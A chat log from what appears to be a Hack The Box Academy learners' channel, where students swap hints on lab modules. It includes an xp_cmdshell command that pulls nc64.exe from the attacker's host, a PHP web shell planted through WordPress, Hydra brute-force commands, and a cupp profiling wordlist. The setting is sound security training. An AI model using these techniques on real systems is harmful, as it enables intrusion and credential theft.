#modules

Hi

New module password attacks is very interesting , but ssh service is very long to brute-force (password mutation)

Used given wordlist in ressources

same for another service in the same machine

could anyone give me a nudge on where i can find the ldap password for windows priv esc - skills assessment 1?

do you have to restart your vpn every time you jump over to a new box?

so ive been doing the getting started and im on the privilege escalation part i can write to moniter.sh but i keep getting error messages when i go to execute it with sudo would someone help me out cause ive tried to trouble shoot this for a long af time now and even found some videos where they are doing the exact same thing but it just works

I got you bruh 🙂

@half temple feel free to DM me 🙂

is anyone on who can help me with linux priv esc skills assessment 1

Did you let it run until success ? I give up pass 45min

Has anybody completed the Shells/Payload module on Htb Academy?

@urban valley I have , but I only took notes on maybe the first half 😦

Anyone finish the wordpress module?

@west canopy or @rustic sage you guys have wordpress notes?

On the password mutation seems to be another service to bruteforce before ssh (with enumeration i hive found some users) but the mutated wordlist il very big

hi i just finished network enumeration with nmap but i dont fully understand a part of it

if anyone can help explain it to me that would be great

i can privately send you the question as to not spoil the module for other people

thank you!

Hi everyone i'm doing shells & payloads and I finished all modules and all final skills assessment except the 2n host regarding 50064.rb exploit i'm traying to export that exploit into metasploit but I need root permissions and I don't know if we can import without being root

Hi !
Do you know how long it takes to do the Bug Bounty Hunter module ?

it depends, but I guess 1 week would be enough

yeah?

Are you in the pwn box?
The credentials are stored on the desktop.

hi

Ok, thank you 🙌

I have notes for wordpress

yes

Does it happen to someone else that they cannot install crackmapexec in the new module of PASSWORD ATTACKS, section --> Network Services ?

Yup. Just
pip3 install crackmapexec
and be done with it.

I agree!

doesn´t work

Not even pip3 install?

Weird.

I have read all the official github documentation and it does not work, the machines must be covered

Github? Don't git clone from github. I'd just install the Python module with pip3.

Post a screenshot of what you tried.

i also tried that

Hello, everyone. Is there a good module in HTB that allows me to study gobuster?

Or is there a simple module that allows you to use gobuster so that you can learn it? Thanks everyone!!

With that it works I had put pipx install crackmapexec instead of pip3 install crackmapexec. I had not realized that x was the version, that happened to me for copypaste 😅

You will use gobuster quite a bit in the gettng started module, the Shells and Payloads module, Using Web Proxies, and Information Gathering -Web Edition

Hey

@livid pier Yep I have wordpress notes

Thank you @west canopy and @lethal atlas 💚

I definitely think it will take longer than a week tbh

Module--> PASSWORD ATTACKS
Section--> Network Services
I can only connect to the WinRM service with user:john password:november , the others won't let me. And I have used the command--> xfreerdp /v:<target-IP> /u:<username> /p:<password>

for each service another user is needed for access and another password . john isn't allowed, for rdp,..

The problem is that it takes a long time to get the passwords, more than 30 min

I have used username.list and password.list files inside PW-Attacks.zip

||after winrm , you can see which accounts are in the system and reduce the list 😉 ||

thanks ill tried it

password mutation is very long (multiples steps)

Doesn´t work

|| Administrator
cassie
chris
dennis
jerome
Public || This are the users but no password found

You must use wordlists from SecLists (like 500 worst passwords)

Module is too long to try bruteforce all services

I know

Yes its a crazy

Is sad :/

dm?

ok

@rustic sage27 I can ou dm too ? 🙂

sure

Maybe it would be good to include a hint that tells you something related to rockyou.txt, in case people get stuck

do you like linux?

Yes

I don’t touch windows

FOSS for life

comedy "mac" option

Mac is based on Unix so it is decent 🤔

But linux is still better

Now module session security

@velvet sparrow Wish i could help brother but I have not started that module yet 😦

just finished the Pandora machine on the main website. took me 4 hours lol. i feel so frustrated and relieved.

and i leveled up to a skript kiddie

Nice work dawg!

Hello, can someone help me with module SHELLS & PAYLOADS on Automating Payloads & Delivery with Metasploit. I can't seem to find the right exploit and gain access to the machine. I feel like i have tried all SMB exploits but can't figure out if i'm doing something wrong or not just overlooking something.

@dry girder I checked my notes and I was able to use the windows/smb/psexec exploit to complete the section.

Also I had to set smbuser and smbpass in the options

When I use psexec I timeout for some reason and i have set correctly my options

Hmm... maybe try respawning the target if you haven't already?

I restarted both the target and workstation and got nothing, but I searched on google and I wrote LHOST to be tun0 and it worked 🙂

We should work together to get to hacker lol

@dry girder Nice! Yes the LHOST will typically always be the IP address for your Tun0 interface

Thank you @west canopy gonna keep this in mind if I see this thing happening again.

Hi are there any updates on the release of this modules?

https://tenor.com/view/chappelles-show-dave-chappelle-chappelles-tyrone-tyrone-biggums-gif-4958017

if you are still having trouble with this, let me know

@west canopy Do you use cherrytree for notes?

I need to start taking more notes, and I was wondering what I should use.

When i work on live boxes I use cherry Tree. For academy modules i just make a google doc and use Windows Snipping Tool for screenshots

Can I sync my notes across devices?

with cherry tree at least

I'm not sure , don't think so but i could be wrong

i don't think it works like OneNote or anything like that

You can save cherrytree as xml. I have decided to upload it to my repo.

I am going to try to take more notes.

We will see how it goes.

i use notion, its pretty good and its free

cant be bothered to spend money unless its games xd

Intro to network traffic analysis

• Interrogating Network Traffic With Capture and Display Filters

Should it be a file “TCPDump-lab-2.zip” to download? I didn’t found any file on that page

Hi there!

I think that the "Packet Inception, Dissecting Network Traffic With Wireshark" lab of the HTB Academy module "Intro to Network Traffic Analysis" is broken! When sniffing on 10.129.43.4, there are no jfif files on HTTP, there's just a "flat.jpeg" file on FTP. So, I can wait and wait and wait, no HTTP JPG files. Thus, I cannot answer the question "What was the filename of the image that contained a certain Transformer Leader? (name.filetype)" with hint "You should have seen three image files pulled in the traffic. water.jpg, htb.jpeg, and ..?". Has anybody similar problems?

can someone help me with Password Attacks Lab - Medium I found the user j......... and the pass but when I try SSH with the user it won't connect

Hello
Im trying to pwn the ARCHETYPE machine in Tier 1 of HTB
I managed to connect to the SQL server and configure the xp_cmdshell
I printed working directory to see if it was working, and it did
But I keep having issues when I run this particular command: xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://{MY_IP}/nc.exe/nc64.exe -outfile nc64.exe"
I keep getting an error saying so such command as wget
How do I fix this?

What section?

Password Attacks Lab - Medium

Skills Assessment ----> Password Attacks Lab - Medium

@shadow mist Try checking under the "Resources" section of the module

Password Attacks - Mutation section...drawing a blank...any hints?

Ignore that...I literally just found what I need...but it took and hour...

@rustic sage Try using the Wireshark-lab-2.pcap file provided under Resources. You should be able find the solution by exporting objects from the pcap.

@patent maple I think wget in powershell is an alias and might not be a native command. Maybe try using "Invoke-WebRequest"

You cannot sync with cherry tree although I wish you could.

Any hint

BROKEN AUTHENTICATION

look at the token that is generated.
Then write a script that creates tokens in the same style and bruteforce the web application with it.

Take a look at Obsidian. I really like using Obsidian for my notes.

Need some help with the XSS skills assesment.

One thing I am having trouble in with this module is that I am confused how to find XSS vulnerabilities.

I don't know if I should be using tools, doing code review or just brute forcing different payloads until one works.

@raven cairn you are basically just re-doing what you did in the Session Hijacking portion. Using different payload formats to find out which parameter is vulnarable

👍 Thanks. I will try hard to finish this question, and if I am having trouble I will come back

@west canopy My flag is not working (or i might be wrong). Can i dm to double check if U have the right cookie?

sure

Hi, can someone help me with the "Username Brute Force" section of the Login Brute Forcing module? The question is "Try running the same exercise on the question from the previous section, to learn how to brute force for users." Can't seem to get it to work

Ayoooo thanks Jared.

@urban valley The answer is the same as the question on the previous section. Just instead of using a Combined Credentials Wordlist, you will supply the password and then use a wordlist for Usernames.

Can anyone give any hint on skill assessements of command injection?

Hey guys

@fast timber Notice how you can either Copy or Move a file to the TMP directory. The injection point is related to that 🙂

WOW I got it but absolutely dumb question. The answer was literally in the question but I kept thinking I needed new credentials. thank you though!

Could you also give me a hint/tip for Skill Assessment- Service Login Part 2? " Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag." I got into the SSH and I'm trying to brute force ftp into the other user. But I don't know if im using the correct port. I'm using the given syntax they gave: netstat -antp | grep -i, to find my ports on the ssh server

@urban valley You will want to run Hydra from inside the target. There should be a certain rockyou.txt file there. Try running hydra against the loopback IP address

Tried to brute force using the loopback: 127.0.0.1, didnt work

@urban valley DM me 🙂

Anyone working on the Bash Script Mod?

need some help

Module: Footprinting
Task: Lab -Easy
Question: How can i copy generated rsa keys to server?

i haven't done that but start a python sever and use curl or wget

might work

@stark tapir the command from within the ftp server would be something like: get id_rsa (this will transfer the key from the ftp server to your machine)

hello bro, thx will try )

hoo sorry it is from ftp

how do you enumerate the users ? i brute force all services but can not get anything

y it's not working ??

hello anyone ???

@onyx wasp your bottom screenshot should be correct. Maybe try refreshing the page?

okiee

nothing happened still same problem

lol i get the solution

Any hint

I am stuck on

Hybrid Mode```
Would be happy to get some help

In PASSWORD ATTACKS - Password Mutations, is it normal to spend more than two hours on the assessment?

Anyone available for a nudge on getting Drupalgeddon3 to work on the Attacking Common CMS module?

It took me an hour to get one ssh user yesterday...looking for another now for over an hour...I think it's all about getting an optimum mutated password list to try and reduce the time...and enumerating to ensure you have a small number of real users that exist on the box...

That's what I am actually trying to do. The exercise statement is a bit misleading, though (it doesn't mention you have to reduce, it kinda takes it for granted).

Yeah i found that...enumerate more (with techniques NOT in the Password Attacks module)...there is only a very limited number of users on there, and there's a password policy, which should allow you to reduce the size of the lists considerably...

Thanks for the hint. Still stuck, but made some progress.. gonna try again later today.

Hello! I am working through the Network Enumeration with NMAP module on the Firewall and IDS/IPS Evasion - Medium Lab section. I cannot get the DNS server version, can someone help me please?

@regal sierra DM me if you still need help

@jaunty patrol feel free to DM me as well

Can someone help with this question for File Inclusion?

Can't read /usr/share/flags/flag.txt for some reason

Can anyone help?

Is this module broken or something?

@late beacon I just tested on my end, I'm not able to read the flag either

Damn that sucks. @blissful verge can you help out with this?

Did you complete this module already?

Yep, I have screenshots in my notes for what I did to solve each section. Tried to recreate them and could not get the flag. I was able to read /etc/passwd though.

Must be some new changes that broke this section of it. I was able to read /etc/passwd as well. Perhaps you could DM me the flag value? I know how to get it, it's just not working.

Any clue for 🤔 Module--> PASSWORD ATTACKS
Section--> Credential Hunting in Linux

This whole module is broken

Can anybody help me with the third question from OSINT module, section Active Subdomain Enumeration ???

Has anybody done Secure Sessions skills assessment? I'm really not sure what I'm supposed to be doing. The API endpoint looks to be vulnerable to RFI, and a successful query shows "adminVistedTrue", but the auth-session cookie is the same as if I just log in to the site as a regular user.

anyone completed "Information Gathering - Web Edition" ? I'm stuck on the first question of the "Active Subdomain Enumeration:" section. When I enter "inalnefreight.htb" on hackertarget.com/zone-transfer/, I get "error check your api query"

Looks like the whole academy is broken rn

i had the same issue with the question yesterday though :/

Did you complete the File Inclusions module?

@urban valley try doing something like: dig axfr inlanefreight.htb @ipaddress

I did but I do not remember how I got that flag you are asking for

thank you!

Hello guys i'm on Linux File Transfer Methods , trying to download the flag.txt file with python but i get connection refused even the url(port 80) is 403 Forbidden ,can anyone help ?

@frigid quail Can you send a screenshot so I can see what's happening?

@late beacon hey daniel i remember now how to get that flag, can you DM me

Okay I will try this
Thanks

can someone help me with 'web request' HTTP method GET section its literally the beginner module but I need assistance

@rustic sage DM me 🙂

Looking for help on the Bash Scripting Module. Has anyone who is online finished it?

There were some issues with the docker images but have now been fixed

Trying to figure out if the problem I am having with the solution to the "Comparison Operators" section's final question lay in my script or if it is in my understanding of what is being requested in the first place.

Working on Other PHP Wrappers and getting commands to run but cant figure out the question. It literally says "Submit the contents of the flag.txt file located in the /secrets directory" That looks like it is asking for the secret directory in the root directory which does not seem to exist. Anyone know what I am missing been trying to find a flag.txt file to no avail

As mentioned above, issue was just fixed. Check again

So I should restart the target then?

No.. the question has been clarified

I had saw that flag earlier and tried to submit it multiple times and it did not work

That was the issue.. it's fixed now

Thanks, I appreciate it.

Hey guys - encoutered a problem with proxychains, any advice? it says invalid item in proxylist section: https 127.0.0.1 8080

Here is a screenshot of what I'm getting

@rustic sage You awake? I might need some help lol.

Login Brute forcing, username brute force

I have trouble understanding instructions

It's the same answer as the previous section but instead of using -C with a combination user:pass wordlist, you will do -L for a username list and -p with a password

so it would be something like: hydra -L /opt/useful/SecLists/Usernames/Names/usernames.txt -p admin -u -f 178.35.49.134 -s 32901 http-get /

Ok ok let me try this out. I understand how to use Hydra but understanding instructions. I'll let you know how it goes.

Also how you doin Vivi and Jared? : D

I can't figure out what to do on this Session Security Skills Assessment so my jimmies are a bit rustled

If I did that section I would help you out 😅

One day I will have enough modules under my belt to do so

Thank you guys. Was finally able to solve it.

@frozen sentinel let me know if you still need help with Attacking Common Applications. I don't recall using that exploit specifically but I can check my notes

just started the skills assesment hopefully I can help soon

Carry me Vivi ❤️

can someone help me with PASSWORD ATTACKS module Skills Assessment I'm struggling for 3 days on this, the module is design to struggling not to learn about Password Attacks

Login brute forcing - Section log in attacks. I am confused what is wrong with my command.

hydra -l admin -P home/rockyou.txt -f 178.62.21.52 -s 32381 http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"

I have the right ip and port. Am I not supposed to use rockyou???

@raven cairn rockyou should work through out this whole module. Your command looks right

Hmmmmm It's not working. I am connected to the vpn and the ip/port looks is right

Service Login right?

@west canopy is the submit-solution page supposed to be broken?

@livid pier No it looks like it's an API endpoint

but vulnerable to RFI. Like if you have a netcat listener running you can make it connect to you

@raven cairn maybe the docker target didn't spawn properly?

submit-solution page by itself

submit-solution page trying to reach "evil.txt" file hosted on my machine

I tried using wireshark to sniff packets, I can get an auth-session cookie but it's identical to the cookie I get when I just navigate to the login page

admin visited

this is the way

?

I don't mean to interrupt but Hydra is being weird. Here is my error on Kali. I am trying to do this on my pwnbox but it is taking forever. I wonder if resetting the docker target might work? I've heard there have been some docker issues today.

Its your chat too

hi guyss

hi

Sup @stoic turtle

i lowkey dont know how to hack or anything about code,Do i learn here??

Wondering what my next course of action should be....

This is what I get on the pwnbox

sec i'll try it on my end

@livid pier dang did you solve it already?

lol no

Im toying with the idea of getting a shell

@raven cairn just tested on my end with my Kali VM , i was able to crack the password in a few seconds

Weird!? Did you use the same commands that I did?

yep

The sad emoji definitely hits home

I feel like it does hit my core

Hello!
Module: Footprint
Task: Medium Lab
Question: can't find any way to go into server. I need credentials for every service. Any nudge?

yes

you nmap udp?

nmap-ed udp yes 2 open ports
111/udp open rpcbind
2049/udp open nfs

I was able to get in, but now I get this when I log into the admin portal.

@stark tapir try mounting the NFS share and enumerate the files inside of it to find credentials

Resetting the machines worked : D

@raven cairn that almost looks like its a network or firewall issue on your end

This is the way, i prematured

i tried and it doesnt work, write incorrect credentials when i tri list files in nlunted files. Or i should mount it through UDP?

just regular mount, if you follow the steps in the NFS section you should be able to mount the NFS share. There are a ton of .txt files inside

ls -la
total 64
drwxr-xr-x 1 pc pc 6 мар 24 10:14 .
drwxr-xr-x 1 pc pc 220 мар 24 12:54 ..
drwx------ 2 nobody 4294967294 65536 ноя 11 03:09 nfs

cd nfs
bash: cd: nfs: Permission denied

SUDO

ahahah

thx bro! you saved me again!

alright boys i'm gonna crash, see ya'll later!

Lol I think I am having issues with the docker targets but I'm not sure.

And this is on the pwnbox

It's extremely frustrating when you do everything right on your end and you can't get the flag

Especially when you are new and questioning if you are doing the right thing

Its one thing for something to not work and know it should be working

Its another when you are like oh i guess i was wrong

I guess I will try something else

then waste 2 days trying other things when the first thing you tried and failed was actually the answer

@mortal basin Are the issues I am experiencing possibly on HTB's end?

Specifically not being able to get to the login page.

The other errors were probably problems on my end, but I don't see why I keep getting timed out when I try to connect to the machine's login page on the pwnbox

Nothing of the sort has been reported. If you are having difficulty logging in try contacting the help team

👍 @mortal basin

I was able to get the flag.

Please any hint

Hello everyone, I am currently doing "Windows Fundamentals" HTB Academy. Can anyone help me with some of the steps? I would like to understand this. It's about shared folders, basic NTFS and creating users.

My actual task: "User must change password at logon"
I found out that I was for it:
Set-ADUser -Identity <samAccountName> -ChangePasswordAtLogon $true.
Then I get this error message:

I don't know what to do here =/

@here as you may have guessed from the discussion above, the File Inclusion module is due for an update, so it will be taken down for ~30 minutes..
will let you know once it's updated

Try creating the user using Computer Management.

@here File Inclusion module update released, with 4x the content and several new sections and exercises..
anyone who has previously completed the module is strongly recommended to go through it again 🙂

!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
var=$(echo $var | base64)

    if [[ $var == $value ]] && [ ${#var} -ge 113469 ]  ;
     then
            echo $var | tail -c 20

     else
             echo "Not Found"
   fi

done

Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,469 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

what do

@vernal dagger Try

-eq 113469

it elsed

gt did not do the job either

Ok, try:
||if[[ "$var" =~ "$value" && ${#var} -eq 113469 ]]||

worked

thank you !

Welcome 💯

let me try to get sense out of this

so =~

Checks for substring

oh wow

cool!!

im pleased thank you bro

@vernal dagger If you are interested https://linuxhint.com/equal-tilde-bash/

Hello, I have a strange question. Are you not able to use the HTB vpn (non-subscriber status at the moment) to connect to use your own Kali or Parrot OS to complete the module questions? The reason I am asking is nmap never works (other tools do work) - example sudo nmap -sC -sV 165.227.238.95:32236 which returns no target provided?

@kindred prism You don't specify ports in Nmap like that. Try:

nmap -sC -sV -p 32235 165.227.238.95

Thanks, unfortunately no go. I have reset the target with no success: sudo nmap -sC -sV -p 30383 178.128.163.152 ─╯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-25 08:20 MDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.33 seconds

try adding -Pn as the error suggests.

"Blacklist Filter" section of the File Uploads module has a problem that isn't working for me. Even when I upload a file that has an allowed extension I cannot execute code on the backend server

Would appreciate if someone can test this out

Tried that but it gives me an Error #485 with "your port specifications are illegal"

sudo nmap -sC -sV -p 30383 178.128.163.152 will only scan port 30383 if you want to scan the whole system you need to use sudo nmap -sC -sV -p- -Pn 178.128.163.152

hit me up in DM and I will assist you with it.

Can anybody help me with the third question from OSINT module, section Active Subdomain Enumeration ???

Some help i have the hash || $y$j9T$Xu.Vo5nnA8DZZ.getcrCR.$SkF9OfpfuRNy7nim2hXCwRj/99pWRVsRPEbqntEdU83 || from the root but i cant crack it

What module? OSINT or Information Gathering?

PASSWORD ATTACKS

Section Passwd, Shadow & Opasswd

I havent done that module sorry.

I hear some of the hashes take forever to crack though

What is the hash type of this?

Yes, it is noted that it is a new module

hashid "$y$j9T$Xu.Vo5nnA8DZZ.getcrCR.$SkF9OfpfuRNy7nim2hXCwRj/99pWRVsRPEbqntEdU83" -e
Analyzing '.Vo5nnA8DZZ.getcrCR./99pWRVsRPEbqntEdU83'
[+] BigCrypt

Thanks. No go. I have reviewed the section, but can't complete the question. Thanks for the help anyway.

Sorry bud, I mean information gathering. The third question from the Active Subdomain Enumeration section

I thought so. I have helped on this one many times.

3rd question? DM me

? And for crack it with hashcat 🤨

I dont know. Honestly I don't think I have ever cracked a root password. Users yes, root no.

DM me.

Hi, when i ssh to the given adress, the password i feel is not recongnized. Any help with the ssh command please ?

What section/question? what info are you logging in with? what command are you using?

Hello everyone , I would like your assistant in something simple , Im taking the HTB academy , and in the topic of " Active Infrastructure Identification " for the information , it asking the question " Which CMS is used on app.inlanefreight.local? " Ive been trying to solution, and I have whatweb , but im not sure how to find it

INFORMATION GATHERING - WEB EDITION

DId you nmap it?

I did

but I get bunch of CMS

include the !

hi! im on linux fundamentals. Can someone help me if in there is in the machine the service that request me? I'm in services a process management and they want to use systemctl to find the service with the help of grep command if its necessary but i think it doesn't exist in the machine because nothing match it except one similar service but not the correct

ssh ip adresse

ssh user@ip ?

Ill give it a try , thanks bro

SSH to 10.129.146.57 with user "htb-student" and password "HTB_@cademy_stdnt!". The password is not recongnized

ssh htb-student@10.129.146.75

that is your command?

after http generator

Thank you. I'll try this tomorrow. My session is over for today

Get kali and never run out of session time again 😉

OK has anyone actually succeeded on the Password Attacks Module...mutation section challenge and got the correct flag?

Didnt work

aby suggestions

you included the !?

/yeah

and : whatweb ip -v

Guys any help in the new password attacks module?

Hey i need help me

whats up?

@west canopy Still stuck?

Yep

lol me too

I moved onto the updated LFI module haha

An issue affecting the answer submissions in Password Attacks Skills Assessments has been fixed. If you were experiencing issues with this, please test this on your end and let us know the result.

@west canopy

On "hacking wordpress" module for the RCE via Theme Editor section, I added a web shell via the theme editor (system($_GET['cmd'];) but when I go to my append URL (
http://139.59.174.208:32653/wp-content/themes/twentyseventeen/404.php?cmd=id) i get this error: Fatal error: Uncaught Error: Call to undefined function get_header() in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php:14 Stack trace: #0 {main} thrown in /usr/src/wordpress/wp-content/themes/twentyseventeen/404.php on line 14

<?php ?> have you added that part @urban valley

@urban valley does your template look like this?

Can someone help me in a module?

Possibly, what's up?

I’m at the new password attack module. Stuck on trying to find the pass for the winrm user I found

Ah shoot. I haven't started that module yet 😦

Lol running with different pass lists with no success

yep

yep

What happens if you use curl?

Looks like it's working

try doing cmd=ls

i got a list of directories. if I wanted to enter it do I add the directory I want to enter after the cmd=ls or after the twentyseven? ex: "http://139.59.174.208:32653/wp-content/themes/twentyseventeen/404.php?cmd=ls/README.txt" or ""http://139.59.174.208:32653/wp-content/themes/twentyseventeen/README.txt/404.php?cmd=ls"

you would want to url encode the entire command

cmd=<encoded command>

404.php?cmd=<encoded command>

so like 404.php?cmd=<README.txt> ?

well the command would be: cat README.txt

so you would url encode that

if you wanted to cat /etc/passwd it would look like: cat%20%2Fetc%2Fpasswd

yo wassup you guys

I'm in knowledge check section of getting started module and i've gotten user.txt which is the first task

but now i need to escalate privilege to do the second task and I don't know a way I can do so in meterpreter because most commands aren't working while in meterpreter

so if one of you could maybe be give me a hint on what i'm supposed to do

i'd appreciate it

pls

if you type "shell" into meterpreter it will drop you into a regular system shell

i pretty much always do this because I am not super proficient with meterpreter's commands

daaaaaaaaaaaaaaaaaaaaamn

thanks

For the Priv Esc --- try using the ly4k PwnKit from github

Sorry I'm brand new and trying to figure everything out. What am I missing here?

Has it? The flag that I've found that has worked for someone else is still failing for me 😩

I used ftp-betterdefaultpasslist

Uggg. The login-brute forcing module is being so weird to me.

Login Brute Forcing: Service Authentication Brute forcing ;

I don't see why my command is wrong

hydra -l b.gates -P /opt/useful/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -u -f ssh://178.128.163.152:32703 -t 4

I also tried using rockyou.txt and rockyou-10.txt and those wordlists didn't work for me either

I always get stuck in these stupid little ruts, even if I completely understand the concepts.

You are using the wrong password list

Try to use CuPP

👍 That is a good idea. I will try that and I will report back with my findings.

@kind turret is correct, that password list was for a previous question. for this question you need to create a username list and a password list.

So for the username I shouldn't use b.gates ?

I believe when I first completed the module it did not give you the b.gates. So you can skip the username generator part for this question

but you do have to us cupp to make a password list.

Ironically I am stuck on the Default Credentials section of Broken Authentication. Cant find a form name and get an error with the python file.

Well, got the python file to run. Progress.

It's been taking me a while to crack the password still.... 🤔

did you create a password list file using cupp?

I used username anarchy to generate username wordlists so that might be what I am doing wrong?

Yes

did you select all the extra stuff while creating it?

extra characters, l33t etc

Just did

$ cupp -i

cupp.py! # Common
\ # User
\ ,, # Passwords
\ (oo)____ # Profiler
() )
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]

[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! 😉

First Name: William
Surname: Gates
Nickname: Bill
Birthdate (DDMMYYYY): 28101955

Partners) name: Melinda
Partners) nickname: Ann
Partners) birthdate (DDMMYYYY): 15081964

Child's name: Jennifer
Child's nickname: Jenn
Child's birthdate (DDMMYYYY): 26041996

Pet's name: Nila
Company name: Microsoft

Do you want to add some key words about the victim? Y/[N]: Phoebe,Rory
Do you want to add special chars at the end of words? Y/[N]: y
Do you want to add some random numbers at the end of words? Y/[N]:y
Leet mode? (i.e. leet = 1337) Y/[N]: y

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to william.txt, counting 43368 words.
[+] Now load your pistolero with william.txt and shoot! Good luck!

And as a result, we get our personalized password wordlist saved as william.txt.

👍 I was able to get the password.

nice.

Forgot to do this:

sed -ri '/^.{,7}$/d' william.txt # remove shorter than 8
sed -ri '/[!-/:-@[-`{-~]+/!d' william.txt # remove no special chars
sed -ri '/[0-9]+/!d' william.txt # remove no numbers

yeah that makes a difference.

Oh my fricking gosh

I cannot login

The contents of this module are super easy

Hey yall. If anyone has completed the Bash Scripting Module, I have kind of hit a wall and could use some help. Feel free to DM me, if the shoe fits.

I have the password. But I can't ssh into the machine for the life of me

It won't ask me to input the password

I will try it on my end

I just contacted HTB support and they have not answered me and I have been waiting for a bit

Much appreciated

maybe try using sudo?

i tested on my VM and it seems to be working

Yep. No luck with Sudo. and HTB support team has not answered me for ~25 minutes.

ill try it from pwnbox too

one sec

@raven cairn This might sound silly but maybe try restarting your router? The other day you were having some weird issues that looked to be network or firewall related

Honestly tho. I might. I have been stuck on this ONE problem for about 3 hours now. 😭

Anyone able to give me a nudge on File Inclusion "Basic Bypasses" ? I've tried combining several techniques but none have been successful

Edit: Solved!

I'm going through web proxies and I installed zap and they are asking me to hit the hud button, but the hud never shows?

@ashen orbit In order to see the HUD i had to use Zap's built in browser

I'm using it, keep refreshing but nothing happens

Anybody think they can help me out with the web request module, GET section question?

@jolly sonnet you will want to curl the target using "search.php?search=flag" as part of the URL, along with the Auth token you got from logging in as admin:admin

I havent gotten to that point yet, I'm trying to observe the backend response between the target server and whatever site its getting its info from using the network tab, but the php request on the backend wont show like it does in the module example

This is the example given, everytime I type anything into the search engine located on the target machine, it repeats the initial connection request sequence (http://admin:admin@<ip-address>:<port-num>/)

Seems to be OK on my end. I did a search for "Leeds" and I see the GET request pop up when viewing the requests under "Network".

Weird. How are you accessing the HTB academy platform? I'm just doing it through chrome on my host OS, should I be doing it another way perhaps?

That could definitely be it, they are using firefox in all of the examples. I am using a Kali Linux VM with Firefox.

okay awesome that will probably fix it. I'll start doing it in my kali vm from now on, thanks!

Fuck it not using the hud

@ashen orbit might be a dumb question but do you have the HUD turned on? It's the icon in the top right , next to the firefox icon

Yeah, its on, you have an older version than me, maybe thats the issue, I'm on 2.11.1

If this is for the ZAP scanner section , I was able to complete it without using the HUD

Fyi I was able to fix my issues 🙌🏻 Patience is key. I am going to finish the pentesting path eventually.

I always say I'm going to spend two hours practicing, then play video games, but then it turns into all night

@raven cairn were you able to SSH? what was the issue?

I was able to ssh info the machine. I simpl got a good rest and waited for a couple hours and tried again. I’m not a 100% sure of the issue but here is my best guess. Hydra tends to be a very very noisy tool. I think my firewall was just very angry at me.

@livid pier Holy sh*t dawg I solved it!

oh my god this is like dopamine overload

Good job!!!

good job bruh

Hello

I use kali with remote desktop connection from windows using xrdp wsl2. I have ubuntu on windows do I need to download ubuntu on kali again?

hello

any idea on how to get sudo access to a pwnbox in academy?

i was trying to follow along on the xss course and i need to start a listening server on a port (either netscan or a php server), but i need sudo access to start it

On your desktop you will see a document that puts credentials.txt and there is the password for sudo

oh, ok, thanks

Did anybody finish the xss module recently? i may have an issue and I do not know how to fix it

Dont want the answer, on the "Getting Started : Knowledge Check"
I've random guessed the login 1st try but have been stuck for about 3 hours now trying to figure out a way to exploit this / move to where I need to go. I've used FFUF to find 5 diff extensions i can visit and have found agood amount of what seems to be relevant info from there.

Api Key / Username and Password as well as other stuff.

would like a little nudge /better understanding of what i'm possibly missing if possible.

I see an upload page that doesnt seem to load which is where i thought i'd be able kinda get access, but kinda flailing / stuck atm

was there another way i was supposed to get / find initial access? Other then guess a standard credential thing?

stuck on knowledge check bit of getting started on the part with

||using php to priv esc I know I need to use php I been on gtfobins I tried my own php code the server is running php 7.4.3 and just keeps echoing my commands||

||check the themes tab||

any hint BROKEN AUTHENTICATION skill

Hi, looking for some assistance with Getting Started --> Prvilege Escalation --> second question requires privilege escalation to root but I can't seem to get it. I have tried various GTFOBins with no success.

I finished XSS module recently.

@low vine For foothold you can use a metasploit exploit against the GetSimple CMS being used by the Target

@kindred prism DM me if you still need help with the priv esc 🙂

@valid finch Feel free to DM me as well

I cracked it about an hour ago but thank you for the offer

Hi all

I have one question about hard module skills assessment on passwords attacks

RESOLVED (Thank you @unique valve ): I am getting discouraged using this platform for my cyber security journey. I am putting the right answer for modules and for some reason my answers are incorrect. Is there anyway I can share a screenshot to give an idea of what I am talking about?

Hello, I'm getting an error while doing the RDP in the windows fundamentals, I've followed all the instructions to do the modules from my own terminal but I'm getting an error while trying to connect to target in the RDP section, "errorconnect_connect_transportfailed"

NP. As you can see in the encircled area in the screenshot, these are the supported proxy formats.

I see, so my problem is https format not supported?

You need to specify the kind of server and not the protocol.

So, even for HTTPS, it would be an HTTP server.

You can google a bit "Socket vs HTTP" @idle cliff

Are you connecting from your own box or Pwnbox? Would you mind showing the command you are attempting to use when connecting via RDP ?

What is your question?

Ok cool thank you

Was this directed at me?

It wasnt. I was replying to professor101.

@rustic sage May i ask you a q regarding the Footprinting module in htbA--specifically the DNS section...its a dumb q but I cant figure it out!

Sorry, haven't done it yet.

ok

Does anybody know if I should be updating the subdomains.txt link w real time url?

anytime I try to run this it cant find file..

@compact compass Go to the directory where "Discovery" is under it.

It's pointing to GIT

You need to find all the zones.
There are DNS servers that allow zone transfer (dig axfr) from everyone and then there are DNS servers that allow zone transfer only from certain servers.

Hi, i'm on the "Web Enumeration" -> "Gobuster"
i follow the step, but i'm stucked.
it's what i have to do

And on my terminal, i've this error :

i don't find the problem :/

@cinder quarry you are missing the port number for the target

it's strange, in the example it's not there

with the port number, it works thanks 😉

np!

@acoustic owl I've found all the zones...Cant figure out what im doing wrong!

Hello, I have a dumb question (searched but did not find anything), how do we get root on the pwnbox web machine? I do not have my user password so i can't do sudo and i do not have machine details like in HTB with my user password.
I need to be root or run sudo to edit my /etc/hosts or to use metasploit.
I use a free account on academy.

@tough ibex which module?

shoot, not there yet.

you try Youtube?

anyone have a hint for the broken authentication skills assessment?

||i found the cookie|| and was able to change it to ||support||, but it says that ||it can't have the requested role||

I commented here

@pallid fulcrum check the desktop, there should be a my_credentials.txt file

